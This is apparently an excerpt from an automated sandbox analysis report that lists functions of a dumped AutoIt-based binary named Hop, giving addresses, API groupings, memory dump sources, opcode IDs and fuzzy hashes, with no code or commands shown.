                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8213A65A09F42C1FE549BA1940467962A0BF84B7CF040739DB3E836D8DF3CE494C300
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4A2828 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: e96038359b8bcf9d40ab16245d6c00f02c1c42b7617fe174b97500c319439ec5
                                                                                                                                                                                                                                                                                                          • Instruction ID: 19ae9bd801fa8c9aaa8a10824530c919091d2e80889efde2042a3c963c2453cb
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e96038359b8bcf9d40ab16245d6c00f02c1c42b7617fe174b97500c319439ec5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6711AC75B04B01C2EB18CB62A44802967A2FF88FD4F02853DEE0E93B94CE3DD885C740
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4E117C Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 43455801-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: aa036b7f6b4181bf747b7f25e8c59d16cc241acf913ae98ed06744a76854e657
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8eecd3582e1e6b4a1973e353239896d39f87fa70c379a1ef70b5695a9266cec1
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa036b7f6b4181bf747b7f25e8c59d16cc241acf913ae98ed06744a76854e657
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B118F31B14692C2E714CB15B804B69B760FF85BA8F595138DF1643B51CF7DE499C740
                                                                                                                                                                                                                                                                                                          Function 00007FF68C434050 Relevance: 9.0, APIs: 6, Instructions: 39keyboardCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Virtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 7b1f2997da372a43bc31476f6d0c07695968ad033343f6aabdfa55d6cba17457
                                                                                                                                                                                                                                                                                                          • Instruction ID: e460242f3e63a0c3af7fb6b3fe37f16ff5ffb7cdebf6a8f89bc2669d004fbcee
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b1f2997da372a43bc31476f6d0c07695968ad033343f6aabdfa55d6cba17457
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC111272916644CAD748CF39DC885293BB2FF58B09B55D438C24987265DF3DD4DAC701
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4698C8 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID: #$E$O
                                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-248080428
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3ec0da66385ca5cfa3e6e9d06278922857a071159ec432c0170ef47ddb72b8c3
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0dd8ce36c91f8e85ed6dcc0b2a06159daa29f46ebc1469b7b32e8b6d5289c0b6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ec0da66385ca5cfa3e6e9d06278922857a071159ec432c0170ef47ddb72b8c3
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E414E22A15B91C5FF919B2198409AD23B0BF64B8CB084139EF4D8779DDF7DD485C310
                                                                                                                                                                                                                                                                                                          Function 00007FF68C435648 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: IconLoadNotifyShell_Stringwcscpy
                                                                                                                                                                                                                                                                                                          • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                                                                                                                          • API String ID: 3135491444-4094128768
                                                                                                                                                                                                                                                                                                          • Opcode ID: 354254922fa2c28dd54db28c89f49ff099e9fde37b9e557e9e980069f242a2a6
                                                                                                                                                                                                                                                                                                          • Instruction ID: 058cacb7896dbe85423dc1a87b597becdadbd8aabe6b8555d1a8c6d2212e219d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 354254922fa2c28dd54db28c89f49ff099e9fde37b9e557e9e980069f242a2a6
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF416472A08B86D6EB10DB20E4506FA6361FFD4348F904139E58DC7A9ADF3CE589C740
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4D9C5C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowlibraryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                                                                                                                                                                          • String ID: SysAnimate32
                                                                                                                                                                                                                                                                                                          • API String ID: 4146253029-1011021900
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0f65093a7382f8a48a4cc55905c2204c55616e0901a85524ccd8895086e96556
                                                                                                                                                                                                                                                                                                          • Instruction ID: fb584e8787f7722202dfc51f121e5c07a70eac7677e71bfb5418371bea73c305
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f65093a7382f8a48a4cc55905c2204c55616e0901a85524ccd8895086e96556
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21317E72609781CAE760AF24E440B6A33A1FF85B95F644239DA9D87B94DF3CD881CB00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C458FF4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                          • Opcode ID: bf97d253b0b0f27bc9f8dee52e5b911b6d739ecbcd2cb4f6be9dea0dab631d0a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 65e895ff73873e174120d94095614e511f716b5f7fc55843ddd2a1afebb4023c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf97d253b0b0f27bc9f8dee52e5b911b6d739ecbcd2cb4f6be9dea0dab631d0a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AF06D61A19A4AC1EF84CB11F48027963A0FF88BA8F49543DE94F87664DE7CD4CAC700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C478844 Relevance: 7.8, APIs: 5, Instructions: 265COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: 6a55710d5b20bbebf70dcaf2af2ba2f9473b57b39f5035fa7bc312dbbbf193c7
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5d82951058ad8ba93a6bdb917c961a04d55a67e815928a29330dd6fdb83c7099
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a55710d5b20bbebf70dcaf2af2ba2f9473b57b39f5035fa7bc312dbbbf193c7
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AA1D7B2B0878AC5FF608B6194503B96AA1BF407ACF444639DA6DA7BC5DF3CE584D340
                                                                                                                                                                                                                                                                                                          Function 00007FF68C46EB98 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 49a97c8ce8b369b2f42047b1b1bb4140d0dd21c8d4100dd6dfdde4f7fa664e0d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 40eccda08b8f39e955d1a25e5f9492c0c1a7a0b466a1a650a5aaceda5b560166
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49a97c8ce8b369b2f42047b1b1bb4140d0dd21c8d4100dd6dfdde4f7fa664e0d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15817E62E18A12D5FB209B65D440ABD26E0BF44B9CF44423ADF0E976D9DF3CE486C710
                                                                                                                                                                                                                                                                                                          Function 00007FF68C46E50C Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3659116390-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: fa48a44f82e5a3751bdb722be5fb413316008f962baa66a44dfac203e8cd9eea
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5e92a1e3d0d4979614c18e2c1516f030ea170ff3af00dd5064c731bc30c2c3fa
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa48a44f82e5a3751bdb722be5fb413316008f962baa66a44dfac203e8cd9eea
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02519E72A18A51C9FB10CB65E8547AC7BB0FB44B9CF44813ADF4A97A98DF38D586C700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C472828 Relevance: 7.6, APIs: 5, Instructions: 133COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2e4cf0076cbdf12184df61fca722bc08e1e8edcc07d01b2398d8d0565b611ed0
                                                                                                                                                                                                                                                                                                          • Instruction ID: 783667d35397464c7934bf64bb2d9ecd2b87d580418fb2e07c24675ddfc041a7
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e4cf0076cbdf12184df61fca722bc08e1e8edcc07d01b2398d8d0565b611ed0
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC51C0B2B08786C5EA709B219440179BBF4FF44BA8F194239DAAD876D5DE3CE5C1D700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C431990 Relevance: 7.6, APIs: 5, Instructions: 124keyboardCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4210589936-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 212ea22fed56076fe4411d7c93cd1191e07a29710201a96bd61674af69d79e6f
                                                                                                                                                                                                                                                                                                          • Instruction ID: 39f42c127a6c5f7687f9aa5debad56242a0c84aa207dc8c0a33f3c0a54e9ac67
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 212ea22fed56076fe4411d7c93cd1191e07a29710201a96bd61674af69d79e6f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B151AE32B19682CBE758DF3595405A97BA4FF957A8F100239EE6A83B95CF38E4D1C700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C46B8BC Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
